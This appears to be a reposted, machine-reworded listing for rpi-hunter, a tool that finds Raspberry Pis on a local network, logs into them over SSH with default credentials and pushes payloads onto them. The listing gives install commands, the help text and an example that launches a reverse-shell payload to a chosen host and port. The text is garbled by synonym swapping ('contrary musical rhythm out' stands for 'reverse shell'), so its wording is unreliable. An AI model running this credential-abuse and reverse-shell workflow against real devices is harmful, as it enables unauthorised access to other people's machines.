Rpi-Hunter - Automate Discovering In Addition To Dropping Payloads On Lan Raspberry Pi's Via Ssh

Automate discovering too dropping payloads on LAN Raspberry Pi's via ssh.

rpi-hunter is useful when at that spot are multiple Raspberry Pi's on your LAN amongst default or known credentials, inwards gild to automate sending commands/payloads to them.


  1. Install dependencies: sudo pip install -U argparse termcolor too sudo apt -y install arp-scan tshark sshpass
  2. Download rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
  3. Navigate to rpi-hunter: cd ./rpi-hunter
  4. Make rpi-hunter.py executable: chmod +x rpi-hunter.py
  • One business variant: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST]                      [-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT]                      [--safe] [-q]  optional arguments:   -h, --help         exhibit this assistance message too drib dead   --list             List available payloads   --no-scan          Disable ARP scanning   -r IP_RANGE        IP attain to scan   -f IP_LIST         IP listing to role (Default ./scan/RPI_list)   -u UNAME           Username to role when ssh'ing   -c CREDS           Password to role when ssh'ing   --payload PAYLOAD  (Name of, or raw) Payload [ex. reverse_shell or 'whoami']   -H HOST            (If using reverse_shell payload) Host for contrary musical rhythm out   -P PORT            (If using reverse_shell payload) Port for contrary musical rhythm out   --safe             Print sshpass command, merely don't execute it   -q                 Don't impress banner
  • Example usage: ./rpi-hunter.py -r --payload reverse_shell -H -P 1337
  • Run ./rpi-hunter.py --list to come across avalible payloads.
  • Payloads tin live on specified yesteryear the payload advert from --list or equally raw input
    • ex. --payload reverse_shell or --payload [your cli ascendence here]